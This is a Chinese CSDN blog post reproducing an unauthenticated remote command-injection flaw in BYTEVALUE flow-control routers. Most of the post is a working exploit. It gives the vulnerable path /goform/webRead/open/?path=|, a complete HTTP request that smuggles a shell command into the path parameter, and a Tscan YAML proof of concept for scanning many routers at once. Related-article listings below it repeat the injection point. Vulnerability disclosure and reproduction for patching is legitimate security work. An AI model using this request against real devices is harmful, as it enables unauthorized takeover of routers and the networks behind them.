BYTEVALUE 百为流控路由器远程命令漏洞(含批量验证poc)

已于 2024-04-03 15:22:57 修改
阅读量79 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
于 2024-04-03 15:22:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/137347152
版权
本文介绍了BYTEVALUE流控路由器的一个远程命令执行漏洞,详细描述了漏洞情况,提供了复现步骤及POC使用方法,并给出了修复建议。针对网络安全,尤其是Web安全领域,该漏洞的发现和修复对于提升设备安全性至关重要。
摘要由CSDN通过智能技术生成

0x01漏洞描述

BYTEVALUE百为流控路由拥有强大的多线分流,多线叠加负载均衡功能,加上领先的智能流控QOS技术能解决网吧,小区等公共营业场所带宽不够的难题。该路由器存在远程命令执行漏洞。

0x02漏洞复现

(1)payload利用地址:

/goform/webRead/open/?path=|echo+12345

(2)命令执行POC:

GET /goform/webRead/open/?path=|echo+12345 HTTP/1.1
Host: 127.0.0.1
Accept: */*
Connection: Keep-Alive

0x03POC使用(Tscan验证)

params: []
name: BYTEVALUE 百为流控路由器远程命令漏洞
set:
a1: randomLowercase(8)
rules:



method: GET
path: /goform/webRead/open/?path=|echo+{
  {a1}}
headers: {}
body: ""
search: ""
followredirects: false
expression: response.status == 200 && response.body.bcontains(bytes(string(a1)))
gro
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
百为智能流控路由器 RCE漏洞复现
0xSec
12-04 868
百为智能流控路由器 /goform/webRead/open 路由的 ?path 参数存在有回显的命令注入漏洞,未经身份认证的攻击者可以利用此漏洞执行任意指令,获取服务器权限。
BYTEVALUE 百为流控路由器远程命令漏洞批量验证poc)(1)
2401_83946509的博客
04-15 689
BYTEVALUE百为流控路由拥有强大的多线分流,多线叠加负载均衡功能,加上领先的智能流控QOS技术能解决网吧,小区等公共营业场所带宽不够的难题。对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!最后给大家分享一份全套的网络安全学习资料,给那些想学习 网络安全的小伙伴们一点帮助!对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!
漏洞复现】BYTEVALUE智能流控路由器存在命令执行
zkaqlaoniao的博客
11-10 1271
百为智能流控路由器 /goform/webRead/open 路由的?path 参数存在有回显的命令注入漏洞。攻击者可通过该漏洞在服务器端执行命令,写入后门,获取服务器权限,从而获取路由器权限。
百为智能流控路由器__命令执行【漏洞复现】
m0_64366018的博客
01-25 496
直接访问URL就可以可以回显了,如果没有回显或者302跳转了说明漏洞不存在。
《密码编码学与网络安全原理与实践》第九章 第十章 公钥密码学与密钥管理
m0_57291352的博客
08-09 614
原则上不能说传统密码优于公钥密码,也不能说公钥密码优于传统密码公钥密码学仅限于用在密钥管理和签名这类应用中与密钥分配中心的会话过程既不比传统密码中的那些过程更简单,也不比之更有效动机:简化密钥分配和管理、实现签名等功能不对称性是公钥最为重要的性质,可以用来保证“真实”性,“不可否认”性非对称密钥:两个密钥:公钥和私钥,用来实现互补运算,即加密和解密,或者生成签名与验证签名;公钥证书:认证机构将用户的姓名和公钥绑定在一起,用户用自己的私钥对数字文件签名后,可以通过证书识别签名者,因为签名者是唯一拥有与证书上对
【网络安全】探索AI 聊天机器人工作流程实现RCE
等风来
08-06 198
我发现了一个广泛使用的AI聊天机器人平台中的远程代码执行漏洞。该漏洞存在于聊天机器人的自定义工作流响应代码中,这些工作流允许开发人员通过创建定制的流程来扩展机器人的功能。
蓝屏事件:网络安全的启示
m0_67187271的博客
08-04 1397
这次事件,源于美国电脑安全技术公司“众击”提供的一个带有“缺陷”的软件更新,它如同一颗隐形炸弹,在全球范围内引爆,导致近850万台设备遭遇故障,横跨航空、医疗、传媒等众多关键行业,甚至造成美国超过2.3万架次航班延误,其影响之广令人震惊。该事件突显了在快速迭代的软件更新周期中,充分的测试和评估的重要性。通过强化日志管理、质量管理、风险评估以及灾难恢复计划,结合冗余系统设计和自动化监控工具的应用,我们能够显著提高对类似大规模故障的预防能力和应对速度,为确保系统的稳定性和可靠性奠定坚实的基础。
国家网络安全战略如何保护个人信息安全
waitaikong_的博客
08-09 232
网络安全法》规定了个人信息的收集、使用、存储、传输等活动必须遵守法律法规,经过个人同意,并明确告知收集、使用的目的、方式和范围,同时应当保证个人信息的安全性,避免泄露、丢失或被篡改等情况发生。综上所述,国家网络安全战略的实施对个人信息安全产生了积极的影响,通过法律法规的完善、网络安全教育和培训的重视、关键基础设施的安全保护、国际交流与合作、数据分类分级保护以及数据安全风险管理等措施,有效地提高了个人信息的安全保护水平。通过对数据进行分类分级,可以采取不同的保护措施,确保不同级别的数据得到适当的保护。
重庆市合川区第二届网络安全“钓鱼城“杯部分题解
最新发布
m0_60894143的博客
08-09 363
下载文件后,进行分析往下划看见smb最开始以为是通过smb协议下载的文件找半天没发现,往前翻了翻,看见了flag存储为原始数据通过上述分析发现开头是pk,保存为zip压缩包发现需要密码感觉是伪加密使用工具一把梭再次打开压缩包就发现了flag证实了伪加密下载文件发现是内存文件直接工具分析volatility常规分析一波查看镜像信息分析进程发现没有异常查看cmd历史看到创建用户这个关键点先留意然后查看关键字发现有个zip直接导出到本地改为zip。
企业产品网络安全日志0806
KD的疯狂实验室
08-06 268
默认 method,查询字符串 等会被屏蔽,你在日志中是找不到的。应该是为了隐私安全。启用方式依然是WAF面板配置日志CloudTrail的地方去掉你希望显示的所有共4个✓。采样:每一条WAF规则都会产生一个采样默认。你觉得是一个WAF,如果你有20条规则,到日志里就是20倍的量了。后果是:CloudTrail里数据量会暴增。特别是PutEvent的费用。
自学黑客(网络安全
热门推荐
2301_77160226的博客
08-05 1万+
想自学网络安全(黑客技术)首先你得了解什么是网络安全!什么是黑客!网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web 安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
网络安全第一次作业(ubuntuan安装nginx以及php部署 and sql注入(less01-08)))
Sesessep的博客
08-06 664
1.安装依赖包2.安装nginx到https://nginx.org/en/download.html下载nginx之后将压缩包通过xtfp传输到ubuntu的/usr/local/nginx目录下3.查看编译环境是否有缺失4.编译5.启动nginx6.访问nginx7.增加php源地址8.安装php9.修改监听端口10.启动php-fpm,查看9000端口状况11.测试。
《密码编码学与网络安全原理与实践》第三章 传统加密技术
m0_57291352的博客
08-05 1077
代换置换代换技术(Substitution)定义:将明文字母替换为其他字母、数字或者符号的方法;如果明文被看作二进制比特串,则代换是用密文比特串来替代明文比特串。例如:Caesar密码、单表代换密码、Playfair密码、Hill密码、多表代换密码与一次一密换位技术/置换技术(Transposition):对明文字母的某种置换取得一种类型完全不同的映射。例如:栅栏技术等转轮机:如果将输入输出引脚当作字母表中的一个字母,那么一个圆筒就定义了一个单表替换。隐写术:字符标记、不可见墨水、针刺、打字机的色带校正。
web安全基础学习
m0_71332744的博客
07-31 660
记录学习的原理,少有实操持续更新
网络安全之sql靶场(11-23)
huizhaohaha的博客
08-06 1048
这一关查看源码后发现,username不能进行注入了,但是password依然可以进行注入,但是这就有一个前提条件就是username必须输入正确。看来我猜测是没错,那么接下来就是把payload语句进行base64编码后在进行注入,这里不得不说burpsuite的优势了,自带编码模块(感觉挺爽得啦),payload放下面啦,自己进行编码吧。这一关经过测试感觉和之前的有些区别啦,这时候我分析源码后发现注入点在user-agent上,所以我们可以试着抓包进行注入(使用抓包工具burpsuite进行抓包)
网络安全知识渗透测试
m0_66268916的博客
08-09 316
渗透测试是一种模拟网络攻击,用于识别漏洞并制定规避防御措施的策略。笔测试还有助于评估组织的合规性、提高员工对安全协议的认识、评估事件响应计划的有效性并确保业务连续性。渗透测试的第一步是收集有关目标网络的信息,了解网络拓扑、主机信息、服务信息、用户账户等,以便制定针对性的攻击策略。成功攻破目标系统后,需要进行后渗透测试,巩固攻击成果,并获取更多信息。根据信息收集和漏洞扫描的结果,选择合适的攻击方法,对目标网络进行渗透测试。完成渗透测试后,需要对测试结果进行分析,评估内网的整体安全状况。
哈尔滨等保测评——为工业网络安全保驾护航新航标
weixin_62641226的博客
08-06 367
在这样的大环境下,以“安全第一关”的身份认证为基础,保障了科技创新和数据安全的同步发展,为企业的健康发展提供了坚实的保障。展望今后,哈尔滨还将在工业互联网安全方面不断深入,以“等保”测试为新的“灯塔”,不断推进科技创新和安全实践的深度结合,为实现“工业智能转型”打下坚实的基础,开创了“冰城”网络安全新时代。从系统漏洞检测、风险评估、安全政策审查、紧急应对演习,等保测试就像是一名有经验的舰长,为工业互联网这艘大船提供了准确的航向,规避了所有可能存在的安全隐患,保证了航行的安全性。🌐【工业互联,安全先行】🌐。
网络安全(黑客)—自学手册
dexi113的博客
08-05 1366
此教程为纯技术分享!本教程的目的决不是为那些怀有不良动机的人提供及技术支持!也不承担因为技术被滥用所产生的连带责任!本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。
网络安全 - 应急响应检查表
weixin_43263566的博客
08-06 781
本项目旨在为应急响应提供全方位辅助,以便快速解决问题。结合自身经验和网络资料,形成检查清单,期待大家提供更多技巧,共同完善本项目。愿大家在应急之路一帆风顺。图片皆来源于网络,如有侵权请联系删除。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值